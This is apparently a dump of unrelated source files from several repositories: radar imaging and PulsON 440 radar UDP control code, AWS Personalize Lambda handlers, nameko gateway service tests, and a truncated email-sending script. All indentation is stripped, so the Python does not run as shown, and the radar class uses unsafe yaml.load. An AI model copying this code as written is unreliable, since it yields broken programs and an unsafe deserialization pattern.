total_dists = np.sqrt( np.square( (platform_locs_x-x_locs) ) + np.square( (platform_locs_y-y_locs) ) + np.square( (platform_locs_z-z_locs) ) )
# total_dists = distance(platform_locs_x, platform_locs_y, platform_locs_z, x_loc, y_loc, z_loc)
# x = np.square( (platform_locs_x-x_locs) )
# for i in range(len(data["platform_pos"])) :
# platform_loc = data["platform_pos"][i]
# total_dists.append(math.sqrt( (platform_loc[0]-x_loc)**2 + (platform_loc[1]-y_loc)**2 + (platform_loc[2]-z_loc)**2 ) )
# # plane
# # result = data["range_bins"][0][closest_range_bin - 1]
range_bins_list = []
for i in range(len(total_dists)) :
closest_range_bin_ind = bisect.bisect_left(data["range_bins"][0], total_dists[i]) -1 #TODO: see if its -1 ind or not
# closest_range_bin_ind = int(round((total_dists[i] - data["range_bins"][0][0])/0.01845))
# closest_range_bin_ind = math.floor((total_dists[i] - data["range_bins"][0][0])/0.01845)
# print((total_dists[i] - data["range_bins"][0][0])/0.01845)
scan_data = data["scan_data"][i][closest_range_bin_ind]
range_bins_list.append(scan_data)
# for s in range(scan_data) :
# scan_data[s] = np.abs(scan_data[s])
# print("scan_data: "+str(scan_data))
sum_range_bins = np.sum(range_bins_list)
sum_range_bins = np.abs(sum_range_bins)
pixels[y][x] = sum_range_bins
end_time = time.time()
elapsed_time = end_time-start_time
print("Done.")
print("Elapsed time: "+str(elapsed_time))
imgplot = plt.imshow(pixels, interpolation="gaussian")
plt.show()
```
#### File: main_code/pulson440/unpack_batch.py
```python
import numpy as np
from control import unpack
import argparse
import pickle
def main():
parser = argparse.ArgumentParser(description='batch unpacks data')
parser.add_argument('data_dir', type=str, help='the directory for all of the scan datas')
parser.add_argument('num_files', type=int, help='the number of files')
args = parser.parse_args()
data = []
for i in range(1, args.num_files + 1):
data.append(unpack(args.data_dir + '/scan_' + str(i) + '.txt'))
np_data = np.asarray(data)
print(list(data[1].keys()))
master_dict = {'scan_data': [], 'timestamps': [], 'pulse_idx': [], 'range_bins': [], 'packet_idx': [], 'config': []}
for i in data:
master_dict['scan_data'].append(i['scan_data'])
master_dict['timestamps'].append(i['timestamps'])
master_dict['pulse_idx'].append(i['pulse_idx'])
master_dict['range_bins'].append(i['range_bins'])
master_dict['packet_idx'].append(i['packet_idx'])
master_dict['config'].append(i['config'])
if __name__ == '__main__':
main()
```
#### File: raw_code/pulson440/pulson440_stream.py
```python
__author__ = '<NAME>, <NAME>'
__version__ = '1.0'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
"""References
[1] Monostatic Radar Application Programming Interface (API) Specification
PulsON (R) 400 Series
Version: 1.2.2
Date: January 2015
https://timedomain.com/wp-content/uploads/2015/12/320-0298E-MRM-API-Specification.pdf
"""
# Update path
from pathlib import Path
import sys
if Path('..//').resolve().as_posix() not in sys.path:
sys.path.insert(0, Path('..//').resolve().as_posix())
# Import required modules and methods
from common.constants import SPEED_OF_LIGHT
from collections import OrderedDict
from copy import deepcopy
import math
import logging
import numpy as np
from pulson440.constants import BYTE_ORDER, DEFAULT_SETTINGS, DEFAULT_CONFIG, MAX_PACKET_SIZE, \
FOREVER_SCAN_COUNT, STOP_SCAN_COUNT, MIN_SCAN_COUNT, CONTINUOUS_SCAN_INTERVAL, DT_MIN, \
T_BIN, DN_BIN, SEG_NUM_BINS, UDP_IP_HOST, UDP_IP_RADAR, UDP_PORT_RADAR, REC_SCAN_RES, \
REC_PERSIST_FLAG
from pulson440.formats import MRM_CONTROL_CONFIRM, MRM_CONTROL_REQUEST, MRM_GET_CONFIG_CONFIRM, \
MRM_GET_CONFIG_REQUEST, MRM_SET_CONFIG_CONFIRM, MRM_SET_CONFIG_REQUEST
import socket
import time
import yaml
# Control file
CONTROL_FILENAME = 'control_radar'
class PulsON440:
"""Class for command and control of PulsON 440 radar."""
def __init__(self, logger=None, udp_ip_host=UDP_IP_HOST, udp_ip_radar=UDP_IP_RADAR,
udp_port_radar=UDP_PORT_RADAR):
"""Instance initialization.
Args:
logger (logging.Logger)
Configured logger.
udp_ip_host (str)
IP address of the host computer, i.e., the machine that commands the radar. Defaults
to pulson440_constants.UDP_IP_HOST.
udp_ip_radar (str)
String defining the IP address of the radar. Defaults to
pulson440_constants.UDP_IP_RADAR.
udp_port_radar (int)
Port on radar that the host computer should target when creating the UDP socket.
Defaults to pulson440_constants.UDP_PORT_RADAR.
"""
# Radar status indicators
self.connected = False
self.collecting = False
# Radar system parameters
self.N_bin = [] # Number of bins in scan
# Connection s`ettings
self.connection = {
'udp_ip_host': udp_ip_host, # Host (computer) IP address
'udp_ip_radar': udp_ip_radar, # Radar IP address
'udp_port_radar': udp_port_radar, # Radar port
'sock': []} # UDP socket
# User radar settings; partially higher abstraction than the radar's internal configuration;
self.settings = {key: value['default'] for key, value in DEFAULT_SETTINGS.items()}
# Radar internal configuration
self.config = DEFAULT_CONFIG
# Logger
self._logger = None
self.logger = logger
# Message counter
self.message_count = 0
# Control file
self.control_file_handle = []
def __del__(self):
"""Clean up actions upon object deletion."""
self.disconnect()
"""logger property decorators. Setter validates logger's types is a valid logger type."""
@property
def logger(self):
return self._logger
@logger.setter
def logger(self, value):
if value is None:
self._logger = logging.getLogger('trash')
self._logger.propagate = False
elif not issubclass(type(value), logging.getLoggerClass()):
raise TypeError('Specified logger of incorrect type; expecting subclass of ' +
'logging.Logger!')
else:
self._logger = value
def read_settings_file(self, settings_file='radar_settings.yml'):
"""Read user specified radar settings file.
Args:
settings_file (str)
Path and name of radar settings file.
Raises:
ValueError if setting is out of bounds.
"""
self.logger.info('Reading settings from \'{0}\'...'.format(settings_file))
with open(settings_file, 'r') as f:
radar_settings = yaml.load(f)
self.logger.info('Read following radar settings --> {0}'.format(radar_settings))
# Iterate over each user setting and check bounds if applicable
for setting, value in radar_settings.items():
if setting in DEFAULT_SETTINGS:
if ('bounds' in DEFAULT_SETTINGS[setting] and
DEFAULT_SETTINGS[setting]['bounds'] is not None):
bounds = DEFAULT_SETTINGS[setting]['bounds']
if not (bounds[0] <= value <= bounds[1]):
raise ValueError('Radar setting \'{0}\' is out of bounds!'.format(setting))
self.settings[setting] = value
else:
self.settings[setting] = value
# Update radar configuration
self.logger.debug('Following radar settings being used --> {0}'.format(self.settings))
self.settings_to_config()
def settings_to_config(self):
"""Translate radar settings into radar configuration."""
# Based on the specified start and stop ranges determine the scan start and stop times
scan_start = (2 * float(self.settings['range_start']) / (SPEED_OF_LIGHT / 1e9) +
self.settings['dT_0'])
scan_stop = (2 * float(self.settings['range_stop']) / (SPEED_OF_LIGHT / 1e9) +
self.settings['dT_0'])
N_bin = (scan_stop - scan_start) / T_BIN
N_bin = DN_BIN * math.ceil(N_bin / DN_BIN)
scan_start = math.floor(1000 * DT_MIN * math.floor(scan_start / DT_MIN))
scan_stop = N_bin * T_BIN + scan_start / 1000
scan_stop = math.floor(1000 * DT_MIN * math.ceil(scan_stop / DT_MIN))
# Update radar configuration
self.N_bin = N_bin
self.config['scan_start'] = scan_start
self.config['scan_stop'] = scan_stop
self.config['pii'] = self.settings['pii']
self.config['tx_gain_ind'] = self.settings['tx_gain_ind']
self.config['code_channel'] = self.settings['code_channel']
self.config['node_id'] = self.settings['node_id']
self.config['persist_flag'] = self.settings['persist_flag']
self.logger.debug(
'Settings parsed into following configuration --> {0}'.format(self.config))
def config_to_bytes(self):
"""Converts radar configuration to bytes so it can be written to file.
Returns:
config_bytes (bytes)
The current radar configuration (as stored in instance) represented as bytes.
"""
# Add all configuration fields
config_bytes = b''
for config_field, config_value in self.config.items():
dtype = MRM_GET_CONFIG_CONFIRM['packet_def'][config_field]
config_bytes += (config_value).to_bytes(length=dtype.itemsize, byteorder=BYTE_ORDER,
signed=np.issubdtype(dtype, np.signedinteger))
return config_bytes
def encode_host_to_radar_message(self, raw_payload, message_format):
"""Encode host to radar message.
Args:
raw_payload (dict)
Specifies the payload to encode. Each key must match exactly a key in packet_def
contained in message_format.
message_format (dict)
Message format as defined in formats.py. Primary keys are message_type and
packet_def.
Returns:
message (bytes)
The payload encoded into a byte sequence for transmission to the radar.
Raises:
KeyError if payload does not contain key that must be user defined.
"""
# Make a deep copy of payload to avoid malforming original
payload = deepcopy(raw_payload)
# Update payload w/ message type and ID
payload['message_type'] = message_format['message_type']
payload['message_id'] = self.message_count
# Add all packet fields to message
message = b''
for packet_field in message_format['packet_def'].keys():
dtype = message_format['packet_def'][packet_field][0]
default_value = message_format['packet_def'][packet_field][1]
# Check if current packet field is in payload
if packet_field not in payload:
if default_value is None:
raise KeyError('Payload for message type {0} missing field {1}'.format(
message_format['message_type'], packet_field))
else:
payload[packet_field] = default_value
# Add current packet field's payload value onto message
message += (payload[packet_field]).to_bytes(length=dtype.itemsize, byteorder=BYTE_ORDER,
signed=np.issubdtype(dtype, np.signedinteger))
return message
@staticmethod
def decode_radar_to_host_message(message, message_format):
"""Decode radar to host message.
Args:
message (bytes)
Message byte sequence received from radar.
message_format (dict)
Message format as defined in formats.py. Primary keys are message_type and
packet_def.
Returns:
payload (dict)
Payload decoded from message received from radar.
"""
# Initialize decoded payload
payload = OrderedDict.fromkeys(message_format['packet_def'])
# Iterate over each field in packet definition
byte_counter = 0
for packet_field, dtype in message_format['packet_def'].items():
num_bytes = dtype.itemsize
payload[packet_field] = int.from_bytes(message[byte_counter:(byte_counter + num_bytes)],
byteorder=BYTE_ORDER, signed=np.issubdtype(dtype, np.signedinteger))
byte_counter += num_bytes
return payload
def connect(self):
"""Connect to radar and set up control file.
Raises:
RuntimeError if fails to connect to radar.
"""
# Try to connect to radar
self.logger.info('Trying to connect to radar...')
try:
self.connection['sock'] = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.connection['sock'].setblocking(False)
self.connection['sock'].bind((self.connection['udp_ip_host'],
self.connection['udp_port_radar']))
self.connected = True
except:
raise RuntimeError('Failed to connect to radar!')
# Set up the control file; 0 -> continue, 1 -> stop
self.control_file_handle = open(CONTROL_FILENAME, 'w')
self.control_file_handle.write('0')
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'r+')
self.logger.info('Connected to radar!')
def disconnect(self):
"""Disconnect from radar and close control file.
Raises:
RuntimeError if fails to disconnect from radar.
"""
# Try to disconnect from radar if needed
if not self.connected:
self.logger.info('Cnnnot disconnect, no radar connected!')
else:
self.logger.info('Trying to disconnect from radar...')
try:
if self.collecting:
self.scan_request(scan_count=STOP_SCAN_COUNT)
self.connection['sock'].close()
self.connected = False
self.logger.info('Disconnected from radar!')
except:
raise RuntimeError('Failed to disconnect from radar!')
# Close control file
if self.control_file_handle:
self.control_file_handle.close()
def get_radar_config(self):
"""Get configuration from radar.
Returns:
status_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
RuntimeError if fails to receive radar configuration within timeout.
"""
self.logger.info('Requesting radar configuration...')
# Make sure radar is connected
if self.connected:
# Request the current radar configuration
payload = {}
message = self.encode_host_to_radar_message(payload, MRM_GET_CONFIG_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Wait for radar configuration within the timeout
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['get_config_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_GET_CONFIG_CONFIRM)
self.config = OrderedDict([(key, payload[key]) for key in DEFAULT_CONFIG])
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Get radar configuration timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed to get radar configuration with error code ' +
'{0}!').format(status_flag))
self.logger.info('Get radar configuration successful!')
self.logger.debug('Radar configuration received --> {0}'.format(self.config))
return status_flag
else:
raise RuntimeError('Radar not connected!')
def set_radar_config(self):
"""Set radar configuration based on user settings.
Returns:
ettatus_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
RuntimeError if fails to send radar configuration within timeout.
"""
# Make sure radar is connected
self.logger.info('Setting radar configuration...')
if self.connected:
# Determine desired configuration from user settings
self.settings_to_config()
# Scan resolution; API states that any value aside from 32 will likely cause undesired
# behavior so overwrite it
if self.config['scan_res'] != REC_SCAN_RES:
self.logger.warning('Overriding specified scan resolution of {0} with ' +
'recommended value of {1}'.format(self.config['scan_res'],
REC_SCAN_RES))
self.config['scan_res'] = REC_SCAN_RES
# Configuration persistence flag
if self.config['persist_flag'] != REC_PERSIST_FLAG:
self.logger.warning('Specified persist flag value of {0} not the recommended '
'value of {1}'.format(self.config['persist_flag'],
REC_PERSIST_FLAG))
# Encode configuration into message and send
message = self.encode_host_to_radar_message(self.config, MRM_SET_CONFIG_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Poll for configuration set confirmation from radar within timeout
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['set_config_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_SET_CONFIG_CONFIRM)
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Set radar configuration timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed to set radar configuration with error code ' +
'{0}!').format(status_flag))
self.logger.info('Set radar configuration successful!')
self.logger.debug('Radar configuration set --> {0}'.format(self.config))
return status_flag
else:
raise RuntimeError('Radar not connected!')
def scan_request(self, scan_count, scan_interval=CONTINUOUS_SCAN_INTERVAL):
"""Initiate a set of scans by the radar.
Args:
scan_count (int)
Number of scans to request; refer to [1] for details.
scan_interval (int)
Interval between sequential scans (us); defaults to CONTINUOUS_SCAN_INTERVAL for
continuous scanning.
Returns:
status_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
ValueError if scan_count is not between MIN_SCAN and CONTINUOUS_SCAN.
RuntimeError if fails to send scan request within timeout.
"""
# Check if radar is connected and not already collecting data
if self.connected:
# Check if scan count is within bounds
if scan_count < STOP_SCAN_COUNT or scan_count > FOREVER_SCAN_COUNT:
raise ValueError(('Requested number of scans {0} is outside valid range of {1} ' +
'and {2}').format(scan_count, STOP_SCAN_COUNT,
FOREVER_SCAN_COUNT))
self.logger.info(('Requesting radar scan with {0} scans with scan interval ' +
'of {1}...').format(scan_count, scan_interval))
# Create scan request and send
payload = {'scan_count': scan_count, 'scan_interval': scan_interval}
message = self.encode_host_to_radar_message(payload, MRM_CONTROL_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Check if scan request was successful or not within timeout
if scan_count != STOP_SCAN_COUNT:
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['scan_request_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_CONTROL_CONFIRM)
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Scan request timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed scan request with error code {0}!').format(
status_flag))
self.logger.info('Scan request successful!')
return status_flag
else:
self.logger.info(('Stop scan request made; no confirmation from radar will be ' +
'provided!'))
return 0
else:
raise RuntimeError('Radar not connected!')
def read_scan_data(self, scan_data_filename=None, return_data=False, num_packets=None):
"""Read data returned from radar scans.
Args:
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
num_packets (int)
Number of packets to read. Appropriate value depends on the configuration of the
last scan reques. If None then packets will be read until stop flag is posted to
control file. Defaults to None.
Returns:
scan_data (bytes)
Scan data read from the radar. Needs to unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
RuntimeError if radar not connected already.
"""
# Check if radar is connected and not already collecting data
if self.connected:
# Default return data
scan_data = b''
# Create scan data file if needed
if scan_data_filename is not None:
scan_data_file = open(scan_data_filename, 'wb')
# Add all configuration values to save file
config_bytes = self.config_to_bytes()
scan_data_file.write(config_bytes)
# Read fixed length or streaming data off radar
self.logger.info('Reading data from the radar...')
packet_count = 0
start = time.time()
while True:
try:
packet_data, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
if return_data:
scan_data += packet_data
if scan_data_filename is not None:
scan_data_file.write(packet_data)
packet_count += 1
start = time.time()
# Read the specified number of packets
if num_packets is not None:
if packet_count == num_packets:
break
# Read until stop flag has been posted to the control file
else:
self.control_file_handle.seek(0)
stop_flag = self.control_file_handle.read()
if stop_flag != '0':
self.scan_request(scan_count=STOP_SCAN_COUNT)
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'w')
self.control_file_handle.write('0')
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'r+')
break
# save scan data file
if scan_data_filename is not None:
scan_data_file.close()
scan_data_file = open(scan_data_filename, 'wb')
# Check if single packet read timeout threshold has been violated
except:
if (time.time() - start) > self.settings['read_scan_data_timeout']:
raise RuntimeError('Radar scan data packet read timed out!')
# Read any remaining streaming radar data
if num_packets is not None:
start = time.time()
while (time.time() - start) < self.settings['read_residual_timeout']:
try:
packet_data, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
if return_data:
scan_data += packet_data
if scan_data_filename is not None:
scan_data_file.write(packet_data)
except:
pass
self.logger.info('Successfully read all the data!')
# Close scan data file
if scan_data_filename is not None:
scan_data_file.close()
return scan_data
else:
raise RuntimeError('Radar not connected!')
def quick_look(self, scan_data_filename=None, return_data=False):
"""Executes quick-look with radar to confirm desired operation.
Args:
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
Returns:
scan_data (bytes)
Scan data read from the radar. Needs to unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
RuntimeError if scan data is not being either saved or returned.
RuntimeError if radar not connected already or already collecting data.
"""
# Check if data is being saved in some fashion
if not return_data and not scan_data_filename:
raise RuntimeError('Scan data not being saved to file or returned!')
# Compute number of expected data packets in quick-look
num_quick_look_packets = (math.ceil(float(self.N_bin) / SEG_NUM_BINS) *
self.settings['quick_look_num_scans'])
# Check if radar is connected and not already collecting data
if self.connected and not self.collecting:
self.logger.info('Starting quick-look mode...')
# Send a scan request
self.scan_request(self.settings['quick_look_num_scans'])
self.collecting = True
# Read streaming data from radar and save if desired
scan_data = self.read_scan_data(scan_data_filename, return_data, num_quick_look_packets)
self.collecting = False
self.logger.info('Completed quick-look mode!')
else:
raise RuntimeError('Radar not connected or is already collecting data!')
return scan_data
def collect(self, scan_count=FOREVER_SCAN_COUNT, scan_interval=CONTINUOUS_SCAN_INTERVAL,
scan_data_filename=None, return_data=False):
"""Collects radar data continuously until commanded to stop.
Args:
scan_count (int)
Number of scans to collect. Defaults to FOREVER_SCAN_COUNT.
scan_interval (int)
Interval between sequential scans (us). Defaults to CONTINUOUS_SCAN_INTERVAL.
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
Returns:
scan_data (bytes)
Scan data read from the radar. Needs to unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
ValueError if number of scans is less than minimum accepted value.
RuntimeError if scan data is not being either saved or returned.
RuntimeError if radar not connected already or already collecting data.
"""
# Check if number of scans is less than minimum
if scan_count < MIN_SCAN_COUNT:
raise ValueError('Cannot request less than {0} scans!'.format(MIN_SCAN_COUNT))
# Check if data is being saved in some fashion
if not return_data and not scan_data_filename:
raise RuntimeError('Scan data not being saved to file or returned!')
# Check if radar is connected and not already collecting data
if self.connected and not self.collecting:
self.logger.info('Starting collect mode with {0} scans...'.format(scan_count))
# Send a scan request
self.scan_request(scan_count=scan_count, scan_interval=scan_interval)
self.collecting = True
# Read either undetermined amount of data from continous scanning or predetermined
# amount of scan data based on finite scan count
num_packets = None
if scan_count != FOREVER_SCAN_COUNT:
num_packets = (math.ceil(float(self.N_bin) / SEG_NUM_BINS) * scan_count)
scan_data = self.read_scan_data(scan_data_filename=scan_data_filename,
return_data=return_data,
num_packets=num_packets)
self.collecting = False
self.logger.info('Stopped collect mode!')
else:
raise RuntimeError('Radar not connected or is already collecting data!')
return scan_data
``` |
{
"source": "jjin-2019/recommender-system-dev-workshop-code",
"score": 2
} |
#### File: offline/lambda/check-batch-inference-job-status-lambda.py
```python
import json
import os
import boto3
print('Loading function')
def init():
print('init() enter')
my_config = json.loads(os.environ['botoConfig'])
from botocore import config
config = config.Config(**my_config)
global personalize
personalize = boto3.client('personalize', config=config)
def lambda_handler(event, context):
init()
try:
print("Received event: " + json.dumps(event, indent=2))
return do_handler(event, context)
except Exception as e:
print(e)
raise e
def do_handler(event, context):
batch_inference_job_arn = event['createBatchInferenceJob']['Payload']['batch_inference_job_arn']
describe_batch_inference_job_response = personalize.describe_batch_inference_job(
batchInferenceJobArn=batch_inference_job_arn
)
status = describe_batch_inference_job_response["batchInferenceJob"]["status"]
print("Batch Inference Job Status: {}".format(status))
return {
"statusCode": 200,
"batch_inference_job_arn": batch_inference_job_arn,
"batch_inference_job_status": status
}
```
#### File: lambda/personalize/create-dataset-import-job-lambda.py
```python
import json
import os
import time
import boto3
print('Loading function')
def init():
print('init() enter')
my_config = json.loads(os.environ['botoConfig'])
from botocore import config
config = config.Config(**my_config)
global personalize
global sts
personalize = boto3.client('personalize', config=config)
sts = boto3.client('sts', config=config)
def lambda_handler(event, context):
init()
try:
print("Received event: " + json.dumps(event, indent=2))
return do_handler(event, context)
except Exception as e:
print(e)
raise e
stage = "dev"
def do_handler(event, context):
global stage
stage = os.environ.get('Stage', 'dev')
bucket = event['bucket']
s3_key_prefix = event['prefix']
dataset_group_name = event['datasetGroupName']
dataset_name = event['datasetName']
file_name = event['fileName']
dataset_group_arn = get_dataset_group_arn(dataset_group_name)
print("dataset_group_arn:{}".format(dataset_group_arn))
dataset_arn = get_dataset_arn(dataset_group_arn, dataset_name)
print("dataset_arn:{}".format(dataset_arn))
get_caller_identity_response = sts.get_caller_identity()
aws_account_id = get_caller_identity_response["Account"]
print("aws_account_id:{}".format(aws_account_id))
role_arn = "arn:aws:iam::{}:role/gcr-rs-{}-personalize-role".format(aws_account_id, stage)
print("role_arn:{}".format(role_arn))
create_dataset_import_job_response = personalize.create_dataset_import_job(
jobName="dataset-import-job-{}".format(int(time.time())),
datasetArn=dataset_arn,
dataSource={
"dataLocation": "s3://{}/{}/system/personalize-data/{}".format(bucket, s3_key_prefix, file_name)
},
roleArn=role_arn
)
dataset_import_job_arn = create_dataset_import_job_response['datasetImportJobArn']
print("dataset_import_job_arn:{}".format(dataset_import_job_arn))
return success_response(json.dumps({
"dataset_import_job_arn": dataset_import_job_arn
}))
def get_dataset_group_arn(dataset_group_name):
response = personalize.list_dataset_groups()
for dataset_group in response["datasetGroups"]:
if dataset_group["name"] == dataset_group_name:
return dataset_group["datasetGroupArn"]
def get_dataset_arn(dataset_group_arn, dataset_name):
response = personalize.list_datasets(
datasetGroupArn=dataset_group_arn
)
for dataset in response["datasets"]:
if dataset["name"] == dataset_name:
return dataset["datasetArn"]
def success_response(message):
return {
"statusCode": 200,
"headers": {
"Content-Type": "application/json"
},
"body": message
}
def error_response(message):
return {
"statusCode": 400,
"headers": {
"Content-Type": "application/json"
},
"body": message
}
``` |
{
"source": "JJINDAHOUSE/nameko-study",
"score": 3
} |
#### File: test/interface/test_service.py
```python
import json
from mock import call
from gateway.exceptions import OrderNotFound, ProductNotFound
class TestGetProduct(object):
def test_can_get_product(self, gateway_service, web_session):
gateway_service.products_rpc.get.return_value = {
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
}
response = web_session.get('/products/the_odyssey')
assert response.status_code == 200
assert gateway_service.products_rpc.get.call_args_list == [
call("the_odyssey")
]
assert response.json() == {
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
}
def test_product_not_found(self, gateway_service, web_session):
gateway_service.products_rpc.get.side_effect = (
ProductNotFound('missing'))
# call the gateway service to get order #1
response = web_session.get('/products/foo')
assert response.status_code == 404
payload = response.json()
assert payload['error'] == 'PRODUCT_NOT_FOUND'
assert payload['message'] == 'missing'
class TestCreateProduct(object):
def test_can_create_product(self, gateway_service, web_session):
response = web_session.post(
'/products',
json.dumps({
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
})
)
assert response.status_code == 200
assert response.json() == {'id': 'the_odyssey'}
assert gateway_service.products_rpc.create.call_args_list == [call({
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
})]
def test_create_product_fails_with_invalid_json(
self, gateway_service, web_session
):
response = web_session.post(
'/products', 'NOT-JSON'
)
assert response.status_code == 400
assert response.json()['error'] == 'BAD_REQUEST'
def test_create_product_fails_with_invalid_data(
self, gateway_service, web_session
):
response = web_session.post(
'/products',
json.dumps({"id": 1})
)
assert response.status_code == 400
assert response.json()['error'] == 'VALIDATION_ERROR'
class TestGetOrder(object):
def test_can_get_order(self, gateway_service, web_session):
# setup mock orders-service response:
gateway_service.orders_rpc.get_order.return_value = {
'id': 1,
'order_details': [
{
'id': 1,
'quantity': 2,
'product_id': 'the_odyssey',
'price': '200.00'
},
{
'id': 2,
'quantity': 1,
'product_id': 'the_enigma',
'price': '400.00'
}
]
}
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# call the gateway service to get order #1
response = web_session.get('/orders/1')
assert response.status_code == 200
expected_response = {
'id': 1,
'order_details': [
{
'id': 1,
'quantity': 2,
'product_id': 'the_odyssey',
'image':
'http://example.com/airship/images/the_odyssey.jpg',
'product': {
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
'price': '200.00'
},
{
'id': 2,
'quantity': 1,
'product_id': 'the_enigma',
'image':
'http://example.com/airship/images/the_enigma.jpg',
'product': {
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
'price': '400.00'
}
]
}
assert expected_response == response.json()
# check dependencies called as expected
assert [call(1)] == gateway_service.orders_rpc.get_order.call_args_list
assert [call()] == gateway_service.products_rpc.list.call_args_list
def test_order_not_found(self, gateway_service, web_session):
gateway_service.orders_rpc.get_order.side_effect = (
OrderNotFound('missing'))
# call the gateway service to get order #1
response = web_session.get('/orders/1')
assert response.status_code == 404
payload = response.json()
assert payload['error'] == 'ORDER_NOT_FOUND'
assert payload['message'] == 'missing'
class TestCreateOrder(object):
def test_can_create_order(self, gateway_service, web_session):
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# setup mock create response
gateway_service.orders_rpc.create_order.return_value = {
'id': 11,
'order_details': []
}
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'the_odyssey',
'price': '41.00',
'quantity': 3
}
]
})
)
assert response.status_code == 200
assert response.json() == {'id': 11}
assert gateway_service.products_rpc.list.call_args_list == [call()]
assert gateway_service.orders_rpc.create_order.call_args_list == [
call([
{'product_id': 'the_odyssey', 'quantity': 3, 'price': '41.00'}
])
]
def test_create_order_fails_with_invalid_json(
self, gateway_service, web_session
):
# call the gateway service to create the order
response = web_session.post(
'/orders', 'NOT-JSON'
)
assert response.status_code == 400
assert response.json()['error'] == 'BAD_REQUEST'
def test_create_order_fails_with_invalid_data(
self, gateway_service, web_session
):
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'the_odyssey',
'price': '41.00',
}
]
})
)
assert response.status_code == 400
assert response.json()['error'] == 'VALIDATION_ERROR'
def test_create_order_fails_with_unknown_product(
self, gateway_service, web_session
):
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'unknown',
'price': '41',
'quantity': 1
}
]
})
)
assert response.status_code == 404
assert response.json()['error'] == 'PRODUCT_NOT_FOUND'
assert response.json()['message'] == 'Product Id unknown'
``` |
{
"source": "jjingram/msginabottle",
"score": 3
} |
#### File: jjingram/msginabottle/send.py
```python
import configparser
import smtplib
import imaplib
from email.message import EmailMessage
from email.utils import make_msgid, formatdate
import time
config = configparser.ConfigParser()
config.read('.miabrc')
def prompt(prompt):
return input(prompt).strip()
fromaddr = config['login']['user']
toaddrs = prompt("To: ").split()
print("Enter message, end with ^D (Unix) or ^Z (Windows):")
msg = EmailMessage()
msg['From'] = fromaddr
msg['To'] = ", ".join(toaddrs)
